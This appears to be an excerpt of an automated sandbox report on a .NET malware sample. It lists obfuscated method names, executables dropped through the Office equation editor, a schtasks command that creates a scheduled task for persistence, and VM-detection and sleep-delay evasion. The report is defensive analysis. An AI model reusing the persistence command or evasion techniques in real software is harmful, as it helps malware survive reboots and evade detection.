Source: okilo[1].exe.2.dr, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.cs | High entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
Source: okilo[1].exe.2.dr, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.cs | High entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
Source: okilo[1].exe.2.dr, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.cs | High entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
Source: okilo[1].exe.2.dr, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
Source: okilo[1].exe.2.dr, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.cs | High entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
Source: okilo[1].exe.2.dr, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.cs | High entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
Source: okilo[1].exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | High entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
Source: okilo[1].exe.2.dr, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.cs | High entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
Source: merciesxdncdc.exe.2.dr, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
Source: merciesxdncdc.exe.2.dr, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.cs | High entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
Source: merciesxdncdc.exe.2.dr, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
Source: merciesxdncdc.exe.2.dr, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
Source: merciesxdncdc.exe.2.dr, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
Source: merciesxdncdc.exe.2.dr, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.cs | High entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
Source: merciesxdncdc.exe.2.dr, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
Source: merciesxdncdc.exe.2.dr, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.cs | High entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
Source: merciesxdncdc.exe.2.dr, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.cs | High entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
Source: merciesxdncdc.exe.2.dr, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.cs | High entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
Source: merciesxdncdc.exe.2.dr, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.cs | High entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
Source: merciesxdncdc.exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | High entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
Source: merciesxdncdc.exe.2.dr, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
Source: merciesxdncdc.exe.2.dr, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.cs | High entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
Source: merciesxdncdc.exe.2.dr, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.cs | High entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
Source: JxCmQoa.exe.4.dr, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
Source: JxCmQoa.exe.4.dr, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
Source: JxCmQoa.exe.4.dr, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.cs | High entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
Source: JxCmQoa.exe.4.dr, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
Source: JxCmQoa.exe.4.dr, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
Source: JxCmQoa.exe.4.dr, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
Source: JxCmQoa.exe.4.dr, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.cs | High entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
Source: JxCmQoa.exe.4.dr, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.cs | High entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
Source: JxCmQoa.exe.4.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | High entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
Source: JxCmQoa.exe.4.dr, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.cs | High entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
Source: JxCmQoa.exe.4.dr, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.cs | High entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
Source: JxCmQoa.exe.4.dr, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.cs | High entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
Source: JxCmQoa.exe.4.dr, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.cs | High entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
Source: JxCmQoa.exe.4.dr, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.cs | High entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
Source: JxCmQoa.exe.4.dr, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.cs | High entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.cs | High entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.cs | High entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.cs | High entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | High entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.cs | High entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.cs | High entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.cs | High entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.cs | High entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.cs | High entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, Fa8VLXM23mORvR5dME/HCKUkDbh5y3OV2oc6A.cs | High entropy of concatenated method names: 'kfG46Gu61d', 'PTk4SqjEAg', 'fbB4eWM1tB', 'bqs422jkMh', 'HQR47fZ3vS', 'vXF494PUY4', 'kEZ4qjgk85', 'gvM41Y4HNO', 'GQJ4uSgJ1n', 'PjQ4K0TZCQ'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, XcixWBkBVqsjcaY6KL/OFsmGHhgogBJuaQceU.cs | High entropy of concatenated method names: 'TBvUjS7lP8', 'Q4fUuNHHUD', 'KAFUylqVop', 'ChfU3RNQmq', 'xVFUPj7qNN', 'AGQUXMqKhN', 'jioUdE9HJL', 'J73URxXTnn', 'eJSUCUn5uo', 'd0UUGXJlsJ'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, edM23O9tYBo3W9lyds/OgdU2MJmnLuJrUAowu.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'atTFyjqlwC', 'lriF3OBRwt', 'BreFBgaf10', 'KJ4FPKPpmT', 'zEfFXihnuJ', 'gcXFdvP77o', 'nAUFRaNNpm', 'JnrFHwJRTO'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | High entropy of concatenated method names: 'wTZaS0nBvA', 'TCNa7mT90D', 'C7sa9Heyhs', '.ctor', '.ctor', 'HvMakdf0Mv', 'RUJaehb7wV', 'hdta2bsLZX', 'UyyahGtghd', 'V2TQuv3O2GTfCCOhUOo'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, IHXFP9YcujtIe1fkv0/kTeD6mxEv4W0qYVQoh.cs | High entropy of concatenated method names: 'Q6RUMV6LIj', 'Oc1UOxefwD', 'ornUWFtLC6', 'hytUx6xd1I', 'L4NUv9v5d9', 'WP5UsWAMyC', 'ACsUplcTLj', 'xbdU0uPUah', 'rHFUE0Twv4', 'pAnUVksqey'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, xn2PL6Ay0FbgjDCQUf/UyLOepCdZDDnGoRbQD.cs | High entropy of concatenated method names: '.ctor', 'opga4Q0sxF', 'BItaorKZTM', 'pLAaUnwosb', 'uAhatLyxpT', 'RARaNRD0l6', 'K9oaZAurMg', 'XCK7Hf3gDDwBligG6BE', 'QhJb123S9cGrcrHo9qN', 'Mv0W6M3PIhkEeZ5xXmb'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, dFh6INFVpRyg1i1XS0/qAIrjXyqoofwXavk63.csHigh entropy of concatenated method names: '.ctor', 'RwOarlePvA', 'L1NamsEp4Q', 'tctaM9GGtw', 'bAXaOxs1nZ', 'D0FanqTD6a', 'TMXaWlJFKf', 'jgxaxDfADP', 'aqUagHR5bo', 'qa1avyK3VB'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.csHigh entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
                Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, bu1iYZjjaajwEIC7Iup/w9PdenjqgpAPWgp9wL5.csHigh entropy of concatenated method names: 'Dispose', 'QskaBtjAuY', 'AFqaPB2YbE', 'tVtaXuZSEy', 'get_Text', 'set_Text', '.ctor', 'OnPaint', 'rUR0VgYEXKD42V8HKGP', 'Fp8bSFYlanUNiKPqvWL'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\merciesxdncdc.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile created: C:\Users\user\AppData\Roaming\JxCmQoa.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exeJump to dropped file

                Boot Survival:

                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Window / User API: threadDelayed 9619
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2804 | Thread sleep time: -300000s >= -30000s
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2804 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2188 | Thread sleep time: -47836s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2188 | Thread sleep time: -40000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 3016 | Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2276 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 1916 | Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2488 | Thread sleep time: -3689348814741908s >= -30000s
